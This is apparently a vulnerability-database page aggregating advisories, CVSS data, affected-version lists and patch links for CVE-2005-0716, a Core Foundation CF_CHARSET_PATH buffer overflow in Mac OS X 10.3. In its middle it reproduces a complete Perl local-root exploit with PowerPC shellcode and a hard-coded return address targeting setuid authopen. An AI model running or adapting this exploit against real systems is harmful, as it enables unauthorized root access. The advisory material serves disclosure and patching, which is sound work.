CVE-2005-0716
CVSS 7.2
Published: 2005-03-21 00:00:00
Revised: 2008-09-05 16:47:06

[Original] Stack-based buffer overflow in the Core Foundation Library in Mac OS X 10.3.5 and 10.3.6, and possibly earlier versions, allows local users to execute arbitrary code via a long CF_CHARSET_PATH environment variable.


[CNNVD] Mac OS X CF_CHARSET_PATH Environment Variable Handling Buffer Overflow Vulnerability (CNNVD-200503-124)

        Mac OS X is Apple's operating system.
        The Core Foundation library bundled by default with Mac OS X contains a buffer overflow that may allow a local attacker to gain root privileges.
        The flaw is caused by improper handling of the CF_CHARSET_PATH environment variable. If a string longer than 1024 characters is passed through this variable, a stack-based overflow occurs, letting the attacker control program flow by overwriting a function's return address on the stack.
        Any application linked against the Core Foundation library can serve as an attack vector. Vulnerable setuid-root binaries include su, pppd and login.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can bring the whole system down]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:apple:mac_os_x:10.3.1  Apple Mac OS X 10.3.1
cpe:/o:apple:mac_os_x_server:10.3.3  Apple Mac OS X Server 10.3.3
cpe:/o:apple:mac_os_x_server:10.3.4  Apple Mac OS X Server 10.3.4
cpe:/o:apple:mac_os_x:10.3.6  Apple Mac OS X 10.3.6
cpe:/o:apple:mac_os_x:10.3.2  Apple Mac OS X 10.3.2
cpe:/o:apple:mac_os_x_server:10.3.5  Apple Mac OS X Server 10.3.5
cpe:/o:apple:mac_os_x:10.3.8  Apple Mac OS X 10.3.8
cpe:/o:apple:mac_os_x_server:10.3.1  Apple Mac OS X Server 10.3.1
cpe:/o:apple:mac_os_x:10.3.4  Apple Mac OS X 10.3.4
cpe:/o:apple:mac_os_x_server:10.3.2  Apple Mac OS X Server 10.3.2
cpe:/o:apple:mac_os_x:10.3.3  Apple Mac OS X 10.3.3
cpe:/o:apple:mac_os_x_server:10.3  Apple Mac OS X Server 10.3
cpe:/o:apple:mac_os_x:10.3.7  Apple Mac OS X 10.3.7
cpe:/o:apple:mac_os_x:10.3.5  Apple Mac OS X 10.3.5
cpe:/o:apple:mac_os_x:10.3  Apple Mac OS X 10.3
cpe:/o:apple:mac_os_x_server:10.3.6  Apple Mac OS X Server 10.3.6

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0716
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0716
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-124
(official data source) CNNVD

- Other links and resources

http://www.idefense.com/application/poi/display?id=219&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050321 Mac OS X CF_CHARSET_PATH Buffer Overflow Vulnerability
http://lists.apple.com/archives/security-announce/2005/Mar/msg00000.html
(VENDOR_ADVISORY)  APPLE  APPLE-SA-2005-03-21
http://www.securityfocus.com/bid/13224
(UNKNOWN)  BID  13224

- Vulnerability information

Mac OS X CF_CHARSET_PATH Environment Variable Handling Buffer Overflow Vulnerability
High  Buffer overflow
2005-03-21 00:00:00  2005-10-20 00:00:00
Remote※Local

- Advisories and patches

        The vendor has released an update that fixes this issue; patch download link:
        http://docs.info.apple.com/article.html?artnum=301061

- Vulnerability information (2111)

Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local BOF Exploit (2) (EDBID:2111)
Platform: osX  Type: local
2006-08-02  Verified
Author: Kevin Finisterre
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# I was in the mood for some retro shit this morning, and I need root on some old ass G3 iMacs for a demo.
#
# I got sick of pressing enter on v9's exploit. It gets in the way when scripting attacks.
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#

# Start from an empty environment so that only the two variables set below
# end up on the stack; this keeps the layout, and therefore the hard-coded
# return address, stable between runs.
foreach $key (keys %ENV) {

   delete $ENV{$key};

}

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc =
"\x7c\x63\x1a\x79" .
"\x40\x82\xff\xfd" .
"\x39\x40\x01\xc3" .
"\x38\x0a\xfe\xf4" .
"\x44\xff\xff\x02" .
"\x39\x40\x01\x23" .
"\x38\x0a\xfe\xf4" .
"\x44\xff\xff\x02" .
"\x60\x60\x60\x60" .
"\x7c\xa5\x2a\x79" .
"\x40\x82\xff\xfd" .
"\x7d\x68\x02\xa6" .
"\x3b\xeb\x01\x70" .
"\x39\x40\x01\x70\x39\x1f\xfe\xcf" .
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8" .
"\x90\x61\xff\xf8\x90\xa1\xff\xfc" .
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb" .
"\x44\xff\xff\x02\x7c\xa3\x2b\x78" .
"\x38\x0a\xfe\x91\x44\xff\xff\x02" .
"\x2f\x62\x69\x6e\x2f\x73\x68\x58";

# Target table, "<description>:<padding>". The padding is the number of '.'
# bytes placed in front of the sled in APPL so that the shellcode lines up
# with the return address used below.
$tgts{"0"} = "10.3.7 Build 7T65 on PowerPC:1";
$tgts{"1"} = "10.3.7 debug 0x41424344:0";

unless (($target) = @ARGV) {

       print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

       foreach $key (sort(keys %tgts)) {
               ($a,$b) = split(/\:/,$tgts{"$key"});
               print "\t$key . $a\n";
       }

       print "\n";
       exit 1;
}

# Left over from the original: $retval is never set and $ret is never used;
# the return address is hard-coded in CF_CHARSET_PATH below for every target.
$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Padding: $b\n";

# add a wrapper here if you want more than euid=0
open(SUSH,">/tmp/sh");
printf SUSH "/bin/csh -i\n";
close(SUSH);

# 1048 bytes of filler cover the 1024-byte stack buffer plus whatever sits
# between it and the saved return address on this target; the return address
# is then overwritten with 0xbffffef6, which points into the sled in APPL.
# pack('l') uses native byte order, i.e. big-endian on PowerPC.
$ENV{"CF_CHARSET_PATH"} = "A" x 1048 . pack('l', 0xbffffef6) x 2;

# The sled and shellcode travel in a second environment variable: "iiii"
# decodes to a harmless instruction on PowerPC, and the leading '.' padding
# shifts the sled by the per-target byte count.
$ENV{"APPL"} = "." x $b . "iiii" x 40 . $sc ;

# authopen is set-uid root and linked against Core Foundation, so running it
# with the environment above is enough to trigger the overflow.
system("/usr/libexec/authopen /etc/master.passwd");

# milw0rm.com [2006-08-02]


- Vulnerability information (F36760)

xosx-cf.c (PacketStormID:F36760)
2005-03-24 00:00:00
vade79  fakehalo.us
exploit,overflow,local,root
apple,osx
CVE-2005-0716

Local root exploit for /usr/bin/su on Mac OS X that makes use of the buffer overflow vulnerability discovered by iDefense using the CF_CHARSET_PATH environment variable.

- Vulnerability information (F36748)

iDEFENSE Security Advisory 2005-03-21.t (PacketStormID:F36748)
2005-03-22 00:00:00
iDefense Labs  idefense.com
advisory,overflow,local,root
apple,osx
CVE-2005-0716

iDEFENSE Security Advisory 03.21.05 - Local exploitation of a buffer overflow vulnerability within the Core Foundation Library included by default in Apple Computer Inc.'s Mac OS X could allow an attacker to gain root privileges. iDEFENSE has confirmed this vulnerability in Mac OS X 10.3.5 and Mac OS X 10.3.6. Earlier versions are suspected vulnerable.

Mac OS X CF_CHARSET_PATH Buffer Overflow Vulnerability

iDEFENSE Security Advisory 03.21.05
www.idefense.com/application/poi/display?id=219&type=vulnerabilities
March 21, 2005

I. BACKGROUND

Mac OS X is an operating system for the Apple family of microcomputers.

More information is available at the following link:
http://www.apple.com/macosx/

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability within the Core 
Foundation Library included by default in Apple Computer Inc.'s Mac OS X
could allow an attacker to gain root privileges.

The vulnerability specifically exists due to improper handling of the 
CF_CHARSET_PATH environment variable. When a string greater than 1,024 
characters is passed via this variable, a stack-based overflow occurs, 
allowing the attacker to control program flow by overwriting the 
function's return address on the stack. 

Any application linked against the Core Foundation Library can be used 
as an exploit vector for this vulnerability. Some of the setuid root 
binaries that are vulnerable include su, pppd and login.

III. ANALYSIS

Successful exploitation of this vulnerability allows for root access. An
attacker needs local access to the victim's system to exploit this 
vulnerability. This vulnerability is difficult to work around because a
large number of system binaries are linked against the vulnerable code.

IV. DETECTION

iDEFENSE has confirmed this vulnerability in Mac OS X 10.3.5 and Mac OS 
X 10.3.6. Earlier versions are suspected vulnerable.

V. WORKAROUND

Restrict local access to trusted users only, as it is impossible to 
remove the setuid bit from the affected binaries without severely 
limiting the function of the system.

VI. VENDOR RESPONSE

This vulnerability is addressed in Apple Security Update 2005-003
available at:

   http://docs.info.apple.com/article.html?artnum=301061

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0716 to this issue. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/04/2005  Initial vendor notification
02/04/2005  Initial vendor response
03/21/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- Vulnerability information

15006
Apple Mac OS X AFP Core Foundation Library CF_CHARSET_PATH Variable Overflow
Local Access Required  Input Manipulation
Loss of Integrity
Exploit Public  Vendor Verified

- Vulnerability description

A local overflow exists in Mac OS X. The Core Foundation Library fails to validate the CF_CHARSET_PATH environment variable, resulting in a buffer overflow. With a specially crafted value greater than 1024 characters, an attacker can cause arbitrary code execution, resulting in a loss of integrity.

- Timeline

2005-03-21 2005-02-04
2005-03-21 2005-03-28

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch to address this vulnerability.

- Related references

- Credit

Unknown or Incomplete

- Vulnerability information

Apple Mac OS X Core Foundation Local Buffer Overflow Vulnerability
Class: Boundary Condition Error  BID: 13224
Remote: No  Local: Yes
Published: 2005-03-22 12:00:00  Updated: 2006-08-02 11:16:00
Discovery is credited to Adriano Lima of SeedSecurity.com and an anonymous source.

- Affected versions

Apple Mac OS X Server 10.3.8
Apple Mac OS X Server 10.3.7
Apple Mac OS X Server 10.3.6
Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3
Apple Mac OS X 10.3.8
Apple Mac OS X 10.3.7
Apple Mac OS X 10.3.6
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.3.3
Apple Mac OS X 10.3.2
Apple Mac OS X 10.3.1
Apple Mac OS X 10.3

- Discussion

Mac OS X is prone to a local buffer overflow in Core Foundation. Successful exploitation could result in arbitrary code execution with elevated privileges.

- Exploits

The following exploits are available:

- Solution

Apple has released an advisory (APPLE-SA-2005-03-21) and fixes to address this issue.


Apple Mac OS X Server 10.3.8

Apple Mac OS X 10.3.8

- Related references

 

 
